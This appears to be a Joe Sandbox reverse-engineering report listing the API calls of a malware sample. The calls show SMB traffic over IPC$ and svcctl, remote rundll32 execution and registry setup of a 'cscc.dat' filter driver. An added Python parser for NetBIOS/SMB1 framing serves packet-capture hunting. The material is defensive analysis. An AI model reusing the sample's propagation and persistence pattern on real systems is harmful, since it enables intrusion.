                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74DEF380,?,04854775), ref: 048529BF
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 048529C8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001124,?,04854775), ref: 048529DC
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 048529DF
                                                                      • rand.MSVCRT ref: 048529F0
                                                                      • htons.WS2_32(00000050), ref: 04852A25
                                                                      • rand.MSVCRT ref: 04852A7E
                                                                      • rand.MSVCRT ref: 04852A96
                                                                      • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04852ABB
                                                                      • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04852AD2
                                                                      • rand.MSVCRT ref: 04852AE7
                                                                      • htons.WS2_32(00001120), ref: 04852B06
                                                                      • GetProcessHeap.KERNEL32(00000008,00000160,?,04854775), ref: 04852B6A
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852B71
                                                                      • htons.WS2_32(0000015C), ref: 04852B90
                                                                      • rand.MSVCRT ref: 04852BBE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,?,04854775), ref: 04852BD2
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852BD9
                                                                      • htons.WS2_32(00000044), ref: 04852BF8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001638,?,04854775), ref: 04852C58
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852C5F
                                                                      • memcpy.MSVCRT(00000000,00000000,00001124,?,04854775), ref: 04852C79
                                                                      • memcpy.MSVCRT(00001124,?,00000160,?,?,?,?,04854775), ref: 04852C90
                                                                      • htons.WS2_32(00000050), ref: 04852C9A
                                                                      • memcpy.MSVCRT(000012D8,?,00000048,?,?,?,?,?,?,?,04854775), ref: 04852D17
                                                                      • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04852D37
                                                                      • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04852D4F
                                                                      • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04852D86
                                                                      • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04854775), ref: 04852DB3
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04854775), ref: 04852DBA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DC6
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DCD
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DD9
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DE0
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,04854775), ref: 04852DE9
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DF0
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DFB
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852E02
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                      • String ID:
                                                                      • API String ID: 2063504749-0
                                                                      • Opcode ID: bb3568813610797e8323b4915ac9002a3e8e49b3b015c768a3cfea773b6582a2
                                                                      • Instruction ID: 75e20f53d4d0d12f835640e1d95d0574c4faeef2e79160030a9af38ccfe5906c
                                                                      • Opcode Fuzzy Hash: bb3568813610797e8323b4915ac9002a3e8e49b3b015c768a3cfea773b6582a2
                                                                      • Instruction Fuzzy Hash: 84E1AE75500305EFEB109FA8D885B9A7BF8FF48710F108999EE04DB291E7B9E840CB55
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74DEF380,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?), ref: 04853D2B
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D34
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04853D46
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D49
                                                                      • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853D63
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D66
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?,?), ref: 04853E5B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853E65
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853E68
                                                                      • rand.MSVCRT ref: 04853EC3
                                                                      • memset.MSVCRT ref: 04853EFC
                                                                        • Part of subcall function 04853209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 04853220
                                                                        • Part of subcall function 04853209: HeapAlloc.KERNEL32(00000000,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 04853227
                                                                        • Part of subcall function 04853209: htons.WS2_32(?), ref: 04853246
                                                                        • Part of subcall function 04853209: memcpy.MSVCRT(0000004B,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853276
                                                                        • Part of subcall function 04853209: send.WS2_32(?,00000000,?,00000000), ref: 04853287
                                                                        • Part of subcall function 04853209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485329A
                                                                        • Part of subcall function 04853209: HeapFree.KERNEL32(00000000), ref: 048532A1
                                                                      • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04853F38
                                                                      • htons.WS2_32(?), ref: 04853F5C
                                                                      • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04853FF8
                                                                      • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04854063
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485406E
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854075
                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 0485408F
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04854269,?,00000000,?,?), ref: 048540A0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540A7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?), ref: 048540B6
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540B9
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 048540C2
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540C5
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 048540D0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2208892845-0
                                                                      • Opcode ID: 51a001dadee8562b945d2c2589a1187564fceca54979811e1a2369d3c2f30df8
                                                                      • Instruction ID: 19856749d77a5ca577c716873a8ee32d0b04fd229089733fa0a4bc233d056125
                                                                      • Opcode Fuzzy Hash: 51a001dadee8562b945d2c2589a1187564fceca54979811e1a2369d3c2f30df8
                                                                      • Instruction Fuzzy Hash: 4FD16BB0100300AFD750DF69C884B6ABBE5FF48304F148999FD89DB2A2E779E845CB65
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524AF
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524B8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001124,74DEF380,?,?,?,0485471C,?,?,?,?,?), ref: 048524CD
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524D0
                                                                      • rand.MSVCRT ref: 048524E1
                                                                      • htons.WS2_32(00001120), ref: 048524FF
                                                                      • rand.MSVCRT ref: 0485255F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0485471C,?,?,?,?,?), ref: 04852576
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 0485257D
                                                                      • htons.WS2_32(0000015C), ref: 0485259F
                                                                      • rand.MSVCRT ref: 048525CD
                                                                      • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,0485471C,?,?,?,?,?), ref: 048525E4
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048525EB
                                                                      • memcpy.MSVCRT(00000000,00000000,00001124,?,?,?,0485471C,?,?,?,?,?), ref: 04852605
                                                                      • memcpy.MSVCRT(00001124,?,00000160,00000000,00000000,00001124,?,?,?,0485471C,?,?,?,?,?), ref: 04852617
                                                                      • send.WS2_32(?,00000000,0000111C,00000000), ref: 04852630
                                                                      • send.WS2_32(?,?,00000168,00000000), ref: 0485264D
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04852697
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526BF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526C6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526CF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526D6
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526DF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526E6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526F1
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                                                      • String ID:
                                                                      • API String ID: 3700823678-0
                                                                      • Opcode ID: 5a074e68ef88c5ee083f4d140e47f0c05cccc69010e28c32c4fde50ec78bc6a4
                                                                      • Instruction ID: 697de120f306472af7aa62592c744fd1bfc73b5e6ec7d4b05694f6e1541b8b4c
                                                                      • Opcode Fuzzy Hash: 5a074e68ef88c5ee083f4d140e47f0c05cccc69010e28c32c4fde50ec78bc6a4
                                                                      • Instruction Fuzzy Hash: 6B71C475500346AFEB149FA8DC49B9A7BA8FF48700F048599FE04DF295DBB8E840CB65
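In the three send/recv functions above, each heap buffer is four bytes larger than the value passed to htons right after it (0x1124 with htons(0x1120), 0x160 with htons(0x15C), 0x48 with htons(0x44), and 0x86 with htons(0x82) in the NTLM function earlier), and every read is recv(…, 0xFFFF). That is the shape of a NetBIOS Session Service message: a one-byte type, a three-byte big-endian length and then the SMB payload, exchanged over a single TCP socket. The block below is an added example, not the sample's code and not Joe Sandbox output: it implements that framing and the reassembly a receiver or a packet-capture parser needs, and decodes the fixed SMB1 header. The SMB1 header layout and command-code table come from MS-CIFS; the stream it parses is constructed for the demo and says nothing about what the sample's packets contain.

```python
import struct

# SMB1 command codes (MS-CIFS 2.2.4); anything else is reported as raw hex.
SMB1_COMMANDS = {
    0x25: "TRANSACTION", 0x2E: "READ_ANDX", 0x2F: "WRITE_ANDX", 0x32: "TRANSACTION2",
    0x72: "NEGOTIATE", 0x73: "SESSION_SETUP_ANDX", 0x75: "TREE_CONNECT_ANDX", 0xA0: "NT_TRANSACT",
}


def nbss_frame(payload: bytes, msg_type: int = 0x00) -> bytes:
    """Prefix an SMB message with the 4-byte NetBIOS Session Service header.
    Byte 0 is the message type (0x00 = session message); bytes 1..3 hold the payload length,
    big-endian. For payloads under 64 KiB this is byte-for-byte what zeroing the header and
    storing htons(len) at offset 2 produces, which matches the buffer/htons pairs in the listing."""
    if len(payload) > 0xFFFFFF:
        raise ValueError("payload too large for the NBSS length field")
    return bytes([msg_type]) + len(payload).to_bytes(3, "big") + payload


class NbssReassembler:
    """Accumulates TCP chunks (as recv() returns them) and yields complete NBSS messages."""

    def __init__(self):
        self._buf = b""

    def feed(self, chunk: bytes):
        self._buf += chunk
        msgs = []
        while len(self._buf) >= 4:
            length = int.from_bytes(self._buf[1:4], "big")
            if len(self._buf) < 4 + length:
                break  # message not complete yet; wait for more data
            msgs.append((self._buf[0], self._buf[4:4 + length]))
            self._buf = self._buf[4 + length:]
        return msgs

    @property
    def pending(self) -> int:
        return len(self._buf)


def parse_smb1_header(payload: bytes):
    """Decode the fixed 32-byte SMB1 header; returns None if the payload is not SMB1."""
    if len(payload) < 32 or payload[:4] != b"\xffSMB":
        return None
    cmd, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", payload, 4)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", payload, 24)
    return {
        "command": SMB1_COMMANDS.get(cmd, f"0x{cmd:02x}"),
        "status": status, "flags2": flags2, "tid": tid, "uid": uid, "mid": mid,
        "pid": (pid_high << 16) | pid_low,
        "response": bool(flags & 0x80),  # SMB_FLAGS_REPLY
        "body_len": len(payload) - 32,
    }


def build_smb1(command: int, body: bytes, tid: int = 0, pid: int = 0xFEFF, uid: int = 0, mid: int = 0) -> bytes:
    """Constructed SMB1 request for the demo (not taken from the sample): 32-byte header + body."""
    header = (b"\xffSMB" + struct.pack("<BIBHH", command, 0, 0x18, 0xC807, (pid >> 16) & 0xFFFF)
              + b"\x00" * 8 + b"\x00\x00" + struct.pack("<HHHH", tid, pid & 0xFFFF, uid, mid))
    return header + body


def summarize_stream(chunks) -> list:
    """Push captured chunks through the reassembler and describe every message seen."""
    reasm = NbssReassembler()
    summary = []
    for chunk in chunks:
        for msg_type, payload in reasm.feed(chunk):
            hdr = parse_smb1_header(payload)
            summary.append(hdr if hdr else {"command": "non-SMB1", "nbss_type": msg_type, "body_len": len(payload)})
    return summary


def demo_stream_chunks() -> list:
    """Constructed stream: a small Negotiate, then a Transaction whose NBSS payload is 0x1120 bytes,
    the size the sample frames with htons(0x1120) into a 0x1124-byte buffer. Split at awkward
    boundaries to show that reassembly does not depend on recv() returning whole messages."""
    stream = (nbss_frame(build_smb1(0x72, b"\x00\x00\x00"))
              + nbss_frame(build_smb1(0x25, b"\x00" * (0x1120 - 32), tid=0x0800)))
    return [stream[:3]] + [stream[i:i + 1000] for i in range(3, len(stream), 1000)]


if __name__ == "__main__":
    for entry in summarize_stream(demo_stream_chunks()):
        print(entry)
```

For hunting, the useful side is the reassembler: run it over the TCP payload of a port 445 or 139 conversation extracted from a capture, and the per-message command, TID and body size fall out directly; unusually large TRANSACTION or NT_TRANSACT bodies and session setups right after NEGOTIATE are the things to look at first.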
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04851408
                                                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04851427
                                                                      • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04851453
                                                                      • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 0485147E
                                                                      • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04851495
                                                                      • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 048514B3
                                                                      • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 048514CB
                                                                      • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 048514E9
                                                                      • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04851501
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04851523
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseOpenQuerywsprintf
                                                                      • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                                                      • API String ID: 693892761-175094307
                                                                      • Opcode ID: d2e08028088a2c4d29e617d33c82749262a94dc65a47705b7a05fe61fbd893bf
                                                                      • Instruction ID: fa793ef329e5959390fdbe5b0e6738d9d1b95ba12fbc50f31036b35cc0114a9f
                                                                      • Opcode Fuzzy Hash: d2e08028088a2c4d29e617d33c82749262a94dc65a47705b7a05fe61fbd893bf
                                                                      • Instruction Fuzzy Hash: 5D319EB1E4020CBBEB519E918C49FAF7BBCEF05B44F100955BA02E1250E2B4AF009E65
                                                                      APIs
                                                                        • Part of subcall function 04851EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 04851ED2
                                                                        • Part of subcall function 04851EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851EDB
                                                                        • Part of subcall function 04851EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485943A), ref: 04851F1F
                                                                        • Part of subcall function 04851EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851F22
                                                                        • Part of subcall function 04851EB9: htons.WS2_32(?), ref: 04851F41
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 0485206D
                                                                        • Part of subcall function 04852054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852076
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0485943A), ref: 0485209C
                                                                        • Part of subcall function 04852054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485209F
                                                                        • Part of subcall function 04852054: htons.WS2_32(?), ref: 048520BC
                                                                        • Part of subcall function 04852054: send.WS2_32(?,00000000,?,00000000), ref: 04852131
                                                                        • Part of subcall function 04852054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852148
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 04852168
                                                                        • Part of subcall function 04852054: HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485216F
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04854E76
                                                                        • Part of subcall function 04854E60: HeapAlloc.KERNEL32(00000000), ref: 04854E79
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04854F2A
                                                                        • Part of subcall function 04854E60: HeapFree.KERNEL32(00000000), ref: 04854F2D
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04854F32
                                                                        • Part of subcall function 04854E60: HeapFree.KERNEL32(00000000), ref: 04854F35
                                                                      • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 048551D3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048551DC
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,00000068,74DEF380,?,76ED5E70,?,048551F9,?,?,?), ref: 04854F56
                                                                        • Part of subcall function 04854F43: HeapAlloc.KERNEL32(00000000,?,048551F9,?,?,?), ref: 04854F5D
                                                                        • Part of subcall function 04854F43: rand.MSVCRT ref: 04854F86
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,?,048551F9,?,00000000,?,048551F9,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04854FF7
                                                                        • Part of subcall function 04854F43: HeapFree.KERNEL32(00000000), ref: 04854FFE
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,00000000,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,048551F9,?,?,?), ref: 04855007
                                                                        • Part of subcall function 04854F43: HeapFree.KERNEL32(00000000,?,048551F9,?,?,?), ref: 0485500E
                                                                      • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04855205
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04855208
                                                                      • rand.MSVCRT ref: 0485521B
                                                                      • rand.MSVCRT ref: 04855226
                                                                      • rand.MSVCRT ref: 0485522F
                                                                      • sprintf.MSVCRT ref: 04855246
                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855252
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855255
                                                                      • sprintf.MSVCRT ref: 048552AB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04855308
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485530B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855316
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855319
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04855324
                                                                      • HeapFree.KERNEL32(00000000), ref: 04855327
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                                                      • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                      • API String ID: 1576125627-3210642070
                                                                      • Opcode ID: 95b4ce13214066247afbb9b521dd32b390269a8286a9978a66901865081e4b1d
                                                                      • Instruction ID: 96bea9bcac80865b82349e0da62a9f1ff281bb1ab043240aa6d3912ae07f8e44
                                                                      • Opcode Fuzzy Hash: 95b4ce13214066247afbb9b521dd32b390269a8286a9978a66901865081e4b1d
                                                                      • Instruction Fuzzy Hash: DD51CD72900209BBDF01EFA8DC44FEE7BA9EF49304F044944FE45A6161CBB5E919CB61
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74DEF380,?,?,?,?,?,?,?,?), ref: 048521F5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048521FE
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04852210
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852213
                                                                      • htons.WS2_32(00000029), ref: 0485222E
                                                                      • send.WS2_32(?,?,0000002D,00000000), ref: 04852255
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04852271
                                                                      • memset.MSVCRT ref: 04852297
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027), ref: 048522A3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048522A6
                                                                      • htons.WS2_32(00000023), ref: 048522C1
                                                                      • send.WS2_32(?,?,00000027,00000000), ref: 048522DA
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 048522F2
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852314
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852317
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852323
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852326
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852331
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852334
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                      • String ID:
                                                                      • API String ID: 821554539-0
                                                                      • Opcode ID: f013cb9e48f1324f075ae22c1b92ad08267f49f1a0d4ed984db1db9f01e55ebb
                                                                      • Instruction ID: a70bed4a6d18db709e67c3755b662f8a1548d24f4dd150f8ddce073dfbb96fb9
                                                                      • Opcode Fuzzy Hash: f013cb9e48f1324f075ae22c1b92ad08267f49f1a0d4ed984db1db9f01e55ebb
                                                                      • Instruction Fuzzy Hash: 51417131640305BFEB109FA9DC49F9E7BA8EF49750F008895FD45DB2A0EA78E944CB51
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0485862D
                                                                        • Part of subcall function 04858147: memset.MSVCRT ref: 04858160
                                                                        • Part of subcall function 04858147: GetVersionExW.KERNEL32(?,?,?,74DF0F10), ref: 04858179
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04858645
